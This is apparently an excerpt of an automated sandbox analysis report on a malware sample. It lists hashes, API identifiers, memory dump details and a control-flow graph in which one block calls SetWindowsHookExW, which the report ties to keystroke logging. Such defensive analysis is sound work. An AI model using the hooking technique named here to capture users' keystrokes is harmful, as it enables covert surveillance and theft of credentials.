                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af67612922.jbxd
                                            Similarity
                                            • API ID: CriticalProcess
                                            • String ID:
                                            • API String ID: 2695349919-0
                                            • Opcode ID: 4f50b4b715c02cf28ebad9409d0e5fbcfbb9eaeaecb1ae07bb8473c44290a6c5
                                            • Instruction ID: a81e0b93d6b0d6a40a490ff45ce768bf008178b17bb28347e2b18ba83bc7ebd1
                                            • Opcode Fuzzy Hash: 4f50b4b715c02cf28ebad9409d0e5fbcfbb9eaeaecb1ae07bb8473c44290a6c5
                                            • Instruction Fuzzy Hash: 2C41033190C7588FDB18DFA8D855AE9BBF0FF5A310F04416EE09AC3692DB746846CB91

                                            Control-flow Graph

Control-flow graph (rendered in the original report, with executed and not-executed blocks colour-coded):
  161: 7ffd9b8827a8-7ffd9b8827af
  162: 7ffd9b8827b1-7ffd9b8827b9
  163: 7ffd9b8827ba-7ffd9b88282d
  166: 7ffd9b882833-7ffd9b882840
  167: 7ffd9b8828b9-7ffd9b8828bd
  168: 7ffd9b882842-7ffd9b88287f  calls SetWindowsHookExW
  170: 7ffd9b882881
  171: 7ffd9b882887-7ffd9b8828b8
  edges: 161 -> 162, 161 -> 163, 162 -> 163, 163 -> 166, 163 -> 167, 166 -> 168, 167 -> 168, 168 -> 170, 168 -> 171, 170 -> 171
SetWindowsHookExW installs a Windows message hook; a hook of this kind is the usual mechanism behind the keystroke-logging capability flagged in the overview.
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4109366724.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af67612922.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: aaf80e8d1b64cd2baf8f88d0905acc365cfc5c8f2915d220b02de6f9235d4414
                                            • Instruction ID: 2b7b11b4a626a4064bef4bd8b7126fa0cfa1f892f6ce95281be727aec2fe8f87
                                            • Opcode Fuzzy Hash: aaf80e8d1b64cd2baf8f88d0905acc365cfc5c8f2915d220b02de6f9235d4414
                                            • Instruction Fuzzy Hash: 94310A30A0CA4D4FDB5CEFAC98566F9BBE1EF59321F00027ED019C3292CA74A85287C1